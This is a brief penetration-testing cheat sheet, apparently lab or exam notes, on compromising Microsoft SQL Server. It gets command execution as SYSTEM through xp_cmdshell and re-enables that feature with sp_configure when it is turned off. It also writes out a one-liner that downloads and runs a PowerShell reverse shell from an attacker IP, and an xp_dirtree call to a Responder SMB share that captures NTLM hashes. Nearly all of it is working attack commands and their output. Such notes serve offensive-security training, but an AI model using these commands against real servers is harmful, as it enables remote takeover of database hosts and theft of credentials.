MSSQL Client
Connect via mssqlclient.py
mssqlclient.py [email protected]
It is possible to obtain RCE via xp_cmdshell
SQL> xp_cmdshell whoami
output
nt authority\\system
Get revshell via nishang ps1
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("<http://192.168.119.122/Utilities/Revshells/shell.ps1>") | powershell -noprofile'
Sometimes xp_cmdshell can be disabled :
[-] ERROR(CHIMERA\\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of
the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdsh
ell', search for 'xp_cmdshell' in SQL Server Books Online.
It can be enabled by typing the following:
SQL> sp_configure 'show advanced options', '1'
[*] INFO(CHIMERA\\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
SQL> sp_configure 'xp_cmdshell', '1'
[*] INFO(CHIMERA\\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
Obtain ntlm hashes , set up responder and connect to your smb share via xp_dirtree
xp_dirtree '\\\\10.10.14.14\\a';